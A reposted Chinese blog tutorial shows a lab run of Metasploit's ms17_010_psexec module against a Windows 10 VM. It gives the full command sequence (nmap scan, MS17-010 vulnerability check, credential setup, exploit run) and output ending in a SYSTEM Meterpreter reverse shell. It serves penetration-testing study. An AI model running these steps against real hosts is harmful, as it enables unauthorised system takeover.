自学内容网 自学内容网

metasploit之ms17_010_psexec模块

‌MS17-010_psexec‌是metasploit工具的其中一个模块,‌MS17-010_psexec‌需要靶机的账号密码才能渗透(ms17_010_eternalblue是不需要靶机账密的但是我总是提示超时)

使用MS17-010_psexec‌要求:
防火墙必须允许SMB流量进出。(要么关闭防火墙,要么创建一个共享文件夹只要创建过一次即可哪怕再删了也没关系)
目标系统必须使用SMBv1协议。
目标系统必须缺少MS17-010补丁。
目标系统必须允许匿名IPC $和管道名‌

攻击机: kali 192.168.1.104
靶机: windows 10 企业版虚拟机

1、先测试靶机是否开启445端口 192.168.1.108

┌──(wenqiang㉿kali)-[~]
└─$ nmap -Pn 192.168.1.108
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-21 16:09 CST
Nmap scan report for 192.168.1.108
Host is up (0.00065s latency).       # 这里表示靶机存活。即使禁ping也没关系
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds    # 目标已开启445端口
2869/tcp open  icslap
5357/tcp open  wsdapi
MAC Address: 00:0C:29:E8:5E:F3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.13 seconds

2、确认靶机是否存在ms17-010漏洞

# 进入metasploit控制台
┌──(wenqiang㉿kali)-[~]
└─$ msfconsole   # 该命令进入metasploit控制台
      
# 查询相关漏洞模块有哪些
msf6 > search ms17-010  

# 找到该模块并进入,这个模块用于查询靶机是否存在MS17-010漏洞
msf6 > use auxiliary/scanner/smb/smb_ms17_010 
# 设置靶机ip地址
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.108  # 或 set rhosts 192.168.1.*
# 如果扫描多个ip可以使用多个线程来工作
msf6 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 10
# 查询设置是否正确
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
RHOSTS       192.168.1.108        yes
# 运行该模块查看靶机是否存在ms17-010漏洞,Host is likely VULNERABLE表示存在漏洞,否则显示is not vulnerable。
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.1.108:445     - Host is likely VULNERABLE to MS17-010! - Windows 10 Enterprise 10240 x64 (64-bit)
[-] 192.168.1.108:445     - Errno::ECONNRESET: Connection reset by peer
[*] 192.168.1.108:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

# 进入exploit/windows/smb/ms17_010_psexec开始渗透
msf6  > use exploit/windows/smb/ms17_010_psexec
# 设置靶机ip
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.1.108
# 设置靶机账号密码(需要提前知道共享文件夹的账号密码)
msf6 exploit(windows/smb/ms17_010_psexec) > set smbuser wenqiang    
msf6 exploit(windows/smb/ms17_010_psexec) > set smbpass wenqiang123
# 查看设置是否正确
msf6 exploit(windows/smb/ms17_010_psexec) > show options
# 开始渗透
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 192.168.1.104:4444 
[*] 192.168.1.108:445 - Authenticating to 192.168.1.108 as user 'wenqiang'...
[*] 192.168.1.108:445 - Target OS: Windows 10 Enterprise 10240
[*] 192.168.1.108:445 - Built a write-what-where primitive...
[+] 192.168.1.108:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.108:445 - Selecting PowerShell target
[*] 192.168.1.108:445 - Executing the payload...
[+] 192.168.1.108:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (177734 bytes) to 192.168.1.108
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.108:49897) at 2024-12-21 16:27:29 +0800
# 出现metarpreter表示渗透成功,输入shell回车即可进入靶机
meterpreter > shell
Process 1544 created.
Channel 1 created.
Microsoft Windows [?汾 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

# 我们在靶机的桌面创建一个hello文件夹
C:\Windows\system32>cd \
C:\>cd Users\wenqiang\Desktop
C:\Users\wenqiang\Desktop>mkdir hello
C:\Users\wenqiang\Desktop>dir
2024/12/21  16:27    <DIR>          hello






原文地址:https://blog.csdn.net/qq_25096749/article/details/144632454

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!